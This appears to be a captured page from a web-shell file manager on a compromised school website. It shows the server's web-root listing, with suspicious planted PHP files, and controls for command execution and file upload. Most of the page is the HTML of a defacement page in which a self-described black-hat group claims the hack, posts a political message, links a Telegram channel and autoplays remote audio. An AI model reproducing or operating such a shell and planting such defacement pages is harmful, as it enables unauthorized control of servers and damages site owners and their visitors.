HackFut Security File Manager
Current Path:
D:\Inetpub\vhosts\rahulinternationalschool.com\httpdocs
Command Execution
D:
/
Inetpub
/
vhosts
/
rahulinternationalschool.com
/
httpdocs
/
📄
..
(0 B)
📄
.htaccess
(92 B)
📁
.well-known
📄
Default.aspx
(52.77 KB)
📄
Default.aspx.cs
(373 B)
📄
NewFile
(0 B)
📄
Principal.aspx
(3.21 KB)
📄
SBHW.aspx
(5.09 KB)
📄
SBHW.aspx.cs
(395 B)
📄
Web.config
(489 B)
📄
about.aspx
(3.26 KB)
📄
about.aspx.cs
(277 B)
📄
admissionprocedure.aspx
(2.14 KB)
📄
admissionprocedure.aspx.cs
(290 B)
📄
anehin.txt
(1 B)
📄
api.php
(30.29 KB)
📄
cbse.aspx
(44.33 KB)
📄
cbse.aspx.cs
(323 B)
📄
chairman.aspx
(3.86 KB)
📄
contactus.aspx
(4.13 KB)
📄
contactus.aspx.cs
(360 B)
📁
css
📄
downloads.aspx
(1.29 KB)
📄
downloads.aspx.cs
(395 B)
📄
facilities.aspx
(10.43 KB)
📄
facilities.aspx.cs
(282 B)
📄
fees-structure.aspx
(7.47 KB)
📄
fees-structure.aspx.cs
(286 B)
📄
gallery.aspx
(6.15 KB)
📄
gallery.aspx.cs
(377 B)
📁
images
📁
img
📄
imw5a62f.php
(981 B)
📄
index-old.php
(10.95 KB)
📄
index.php
(4.44 KB)
📁
js
📄
kavda.php
(26.96 KB)
📄
manager.php
(4.44 KB)
📄
md.aspx
(3.29 KB)
📄
meewa.php
(26.96 KB)
📁
owl
📁
pdf
Editing: index-old.php
<!doctype html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Hacked By Team JundAlNabi</title> <link rel="icon" type="image/png" href="https://i.ibb.co/93dmcRt9/image.jpg" /> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { background: #000; color: #0f0; font-family: "Courier New", monospace; text-align: center; padding: 50px 20px; min-height: 100vh; overflow-x: hidden; } .glitch-wrapper { position: relative; display: inline-block; margin: 20px 0; } .glitch-wrapper img { max-width: 400px; border-radius: 20px; display: block; position: relative; z-index: 1; } .glitch-wrapper::before, .glitch-wrapper::after { content: ""; position: absolute; top: 0; left: 0; width: 100%; height: 100%; background: url("https://i.pinimg.com/1200x/cd/e7/08/cde7085ec6a3b38fef4dd0eba41d3b45.jpg") no-repeat center / cover; border-radius: 20px; pointer-events: none; z-index: 2; mix-blend-mode: screen; opacity: 0; animation: glitchShift 3s infinite steps(1); } .glitch-wrapper::after { mix-blend-mode: difference; animation: glitchShift2 2.5s infinite steps(1); } @keyframes glitchShift { 0%, 100% { opacity: 0; clip-path: inset(0 0 0 0); } 5% { opacity: 0.8; clip-path: inset(20% 0 60% 0); transform: translate(-4px, 2px); } 10% { opacity: 0.6; clip-path: inset(50% 0 10% 0); transform: translate(5px, -3px); } 15% { opacity: 0; } 45% { opacity: 0; } 50% { opacity: 0.7; clip-path: inset(70% 0 5% 0); transform: translate(-5px, 0); } 55% { opacity: 0; } 75% { opacity: 0; } 80% { opacity: 0.5; clip-path: inset(5% 0 75% 0); transform: translate(3px, 4px); } 85% { opacity: 0; } } @keyframes glitchShift2 { 0%, 100% { opacity: 0; } 3% { opacity: 0.7; clip-path: inset(35% 0 45% 0); transform: translate(4px, -2px); } 8% { opacity: 0; } 30% { opacity: 0; } 33% { opacity: 0.6; clip-path: inset(10% 0 65% 0); transform: translate(-6px, 3px); } 38% { opacity: 0; } 60% { opacity: 0; } 63% { opacity: 0.5; clip-path: inset(55% 0 25% 0); transform: translate(2px, -5px); } 68% { opacity: 0; } } .glitch-wrapper img { animation: rgbSplit 4s infinite linear; } @keyframes rgbSplit { 0%, 92%, 100% { filter: drop-shadow(0 0 0 transparent); } 94% { filter: drop-shadow(-3px 0 0 #f0f) drop-shadow(3px 0 0 #0ff); } 95% { filter: drop-shadow(0 0 0 transparent); } 96% { filter: drop-shadow(-5px 0 0 #f0f) drop-shadow(5px 0 0 #0ff); } 97% { filter: drop-shadow(0 0 0 transparent); } } h1 { color: #0f0; font-size: 36px; margin: 30px 0 10px; letter-spacing: 3px; animation: flicker 4s infinite; } @keyframes flicker { 0%, 100% { opacity: 1; } 41% { opacity: 1; } 42% { opacity: 0.1; } 43% { opacity: 1; } 45% { opacity: 1; } 46% { opacity: 0.2; } 47% { opacity: 1; } 91% { opacity: 1; } 92% { opacity: 0.1; } 93% { opacity: 1; } } h2 { color: #ff0; font-size: 28px; margin: 15px 0; text-shadow: 0 0 15px #ff0; animation: glitchText 3s infinite; } @keyframes glitchText { 0%, 100% { transform: skew(0deg); text-shadow: 0 0 15px #ff0; } 3% { transform: skew(2deg); text-shadow: -3px 0 #f0f, 3px 0 #0ff; } 6% { transform: skew(0deg); text-shadow: 0 0 15px #ff0; } 50% { transform: skew(0deg); } 53% { transform: skew(-2deg); text-shadow: 4px 0 #f0f, -4px 0 #0ff; } 56% { transform: skew(0deg); text-shadow: 0 0 15px #ff0; } } .message { color: #ccc; font-size: 16px; max-width: 800px; margin: 30px auto; line-height: 1.8; padding: 20px; border: 1px solid #0f0; border-radius: 8px; position: relative; overflow: hidden; } .message::after { content: ""; position: absolute; top: 0; left: 0; width: 100%; height: 100%; background: repeating-linear-gradient( 0deg, transparent, transparent 2px, rgba(0, 255, 0, 0.04) 2px, rgba(0, 255, 0, 0.04) 4px ); pointer-events: none; z-index: 2; } .credits { color: #f00; font-size: 14px; margin-top: 40px; line-height: 2; max-width: 700px; margin-left: auto; margin-right: auto; } .status { color: #ff0; font-size: 13px; margin-top: 10px; } hr { border: none; border-top: 1px solid #0f0; margin: 20px auto; max-width: 400px; } .static-burst { position: fixed; top: 0; left: 0; width: 100%; height: 100%; pointer-events: none; z-index: 999; opacity: 0; background: rgba(255, 255, 255, 0.03); animation: staticFlash 5s infinite; } @keyframes staticFlash { 0%, 95%, 100% { opacity: 0; } 96% { opacity: 0.15; } 97% { opacity: 0; } } .marquee-container { position: fixed; bottom: 0; left: 0; width: 100%; overflow: hidden; background: rgba(0, 0, 0, 0.8); border-top: 1px solid #0f0; padding: 6px 0; z-index: 100; } .marquee-text { display: inline-block; white-space: nowrap; color: #0f0; font-size: 14px; letter-spacing: 2px; animation: scrollLeft 20s linear infinite; } @keyframes scrollLeft { 0% { transform: translateX(100vw); } 100% { transform: translateX(-100%); } } .ascii-glitch { position: fixed; top: 0; left: 0; width: 100%; height: 100%; pointer-events: none; z-index: 0; color: rgba(0, 255, 0, 0.03); font-size: 10px; line-height: 1; overflow: hidden; white-space: pre; animation: asciiDrop 8s linear infinite; } @keyframes asciiDrop { 0% { transform: translateY(0); } 100% { transform: translateY(-50%); } } </style> </head> <body> <div class="static-burst"></div> <div class="ascii-glitch" id="asciiBg"></div> <div class="glitch-wrapper"> <img src="https://i.ibb.co/93dmcRt9/image.jpg" alt=""> </div> <h1>Team JundAlNabi PK</h1> <h2>We are Black Hat Hackers</h2> <div class="message"> Israel kills innocent Palestinians another day, another massacre. While the world watches in silence, Israeli forces continue their brutal campaign of terror against unarmed Palestinian civilians in Gaza and the occupied West Bank. Children pulled from rubble. Families wiped out. Hospitals bombed. Homes destroyed. The occupation spares no one. No patch, no firewall, no backup can save a regime built on blood. We, Team JundAlNabi PK, stand with Palestine. We hack to expose the oppressors. This site is compromised as a message: silence is complicity. Free Palestine. </div> <a href="https://t.me/jundalnabi">Team JundAlNabi Channel</a> <br><br> <div> <audio src="https://alet8319-png.github.io/mismatch/Sawarim.mp3" controls autoplay></audio> </div> <hr /> <div class="credits"> [ GREATZ ]<br /> This Site Has been Hacked By Team JundAlNabi PK for Palestine </div> <div class="status">Owned: <span id="time"></span></div> <div class="marquee-container"> <div class="marquee-text"> #FreePalestine — Israel kills innocent Palestinians another day, another massacre — While the world watches in silence — Team JundAlNabi PK — Palestine will be free — — </div> </div> <script> function updateTime() { document.getElementById("time").textContent = new Date().toLocaleString(); } updateTime(); setInterval(updateTime, 1000); (function generateAscii() { const chars = "@#&$%*!?;:.,-~+=<>^/\\|{}[]()"; let lines = []; for (let i = 0; i < 80; i++) { let line = ""; for (let j = 0; j < 200; j++) { line += Math.random() > 0.6 ? chars[Math.floor(Math.random() * chars.length)] : " "; } lines.push(line); } document.getElementById("asciiBg").textContent = lines.join("\n") + "\n" + lines.join("\n"); })(); setInterval(() => { const body = document.body; const origBg = body.style.background; body.style.background = "#fff"; setTimeout(() => { body.style.background = origBg || "#000"; }, 50); }, 8000); </script> </body> </html>
Upload File
Create Folder